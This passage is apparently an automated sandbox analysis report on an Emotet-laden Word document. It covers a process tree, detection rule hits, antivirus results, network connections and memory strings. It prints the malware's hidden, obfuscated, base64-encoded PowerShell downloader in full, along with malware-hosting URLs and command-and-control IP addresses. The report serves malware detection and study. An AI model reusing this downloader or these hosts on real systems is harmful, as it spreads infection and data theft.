awA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
      • rundll32.exe (PID: 6760 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • rundll32.exe (PID: 6728 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5616 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x2ba:$s1: POwersheLL
    00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x5b0:$s1: POwersheLL
    • 0x45c0:$s1: POwersheLL
    00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x191c:$s1: POwersheLL
      Click to see the 6 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.2.rundll32.exe.f20000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
        8.2.rundll32.exe.f40000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
          6.2.rundll32.exe.1090000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            6.2.rundll32.exe.1070000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              6.2.rundll32.exe.1070000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                Click to see the 1 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoA

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: https://www.isatechnology.com/training/b/Avira URL Cloud: Label: malware
                Source: http://transfersuvan.com/wp-admin/OVl/Avira URL Cloud: Label: malware
                Source: http://arquivopop.com.br/index_htm_files/Kxh/Avira URL Cloud: Label: malware
                Source: https://cairocad.com/cgi-bin/1PBB/Avira URL Cloud: Label: malware
                Source: http://ownitconsignment.com/files/b/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URLShow sources
                Source: isatechnology.comVirustotal: Detection: 7%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllMetadefender: Detection: 52%Perma Link
                Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllReversingLabs: Detection: 96%
                Multi AV Scanner detection for submitted fileShow sources
                Source: v22Pc0qA.doc.docVirustotal: Detection: 72%Perma Link
                Source: v22Pc0qA.doc.docMetadefender: Detection: 44%Perma Link
                Source: v22Pc0qA.doc.docReversingLabs: Detection: 86%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F593E4 CryptDecodeObjectEx,8_2_00F593E4

                Compliance:

                barindex
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                Uses secure TLS version for HTTPS connectionsShow sources
                Source: unknownHTTPS traffic detected: 194.209.195.106:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.208.182.43:443 -> 192.168.2.4:49744 version: TLS 1.2
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4A461 FindFirstFileW,8_2_00F4A461
                Source: global trafficDNS query: name: physio-svdh.ch
                Source: global trafficTCP traffic: 192.168.2.4:49742 -> 194.209.195.106:443
                Source: global trafficTCP traffic: 192.168.2.4:49742 -> 194.209.195.106:443
                Source: global trafficTCP traffic: 192.168.2.4:49773 -> 50.116.111.59:8080
                Source: Joe Sandbox ViewIP Address: 97.120.3.198 97.120.3.198
                Source: Joe Sandbox ViewIP Address: 97.120.3.198 97.120.3.198
                Source: Joe Sandbox ViewIP Address: 50.116.111.59 50.116.111.59
                Source: Joe Sandbox ViewASN Name: CENTURYLINK-US-LEGACY-QWESTUS CENTURYLINK-US-LEGACY-QWESTUS
                Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /hzctvbal94fl2bqa/ HTTP/1.1DNT: 0Referer: 173.249.20.233/hzctvbal94fl2bqa/Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 173.249.20.233:443Content-Length: 8516Connection: Keep-AliveCache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 97.120.3.198
                Source: unknownTCP traffic detected without corresponding DNS query: 97.120.3.198
                Source: unknownTCP traffic detected without corresponding DNS query: 97.120.3.198
                Source: unknownTCP traffic detected without corresponding DNS query: 70.180.33.202
                Source: unknownTCP traffic detected without corresponding DNS query: 70.180.33.202
                Source: unknownTCP traffic detected without corresponding DNS query: 70.180.33.202
                Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
                Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
                Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F414E6 InternetReadFile,8_2_00F414E6
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
                Source: svchost.exe, 0000000F.00000003.750584532.00000279643EB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-28T09:10:05.3582025Z||.||5328ddc5-b339-498a-8e19-ab9110f64f21||1152921505693002334||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                Source: svchost.exe, 0000000F.00000003.750584532.00000279643EB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-28T09:10:05.3582025Z||.||5328ddc5-b339-498a-8e19-ab9110f64f21||1152921505693002334||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI",A equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI",A equals www.twitter.com (Twitter)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE@o equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE@o equals www.twitter.com (Twitter)
                Source: svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 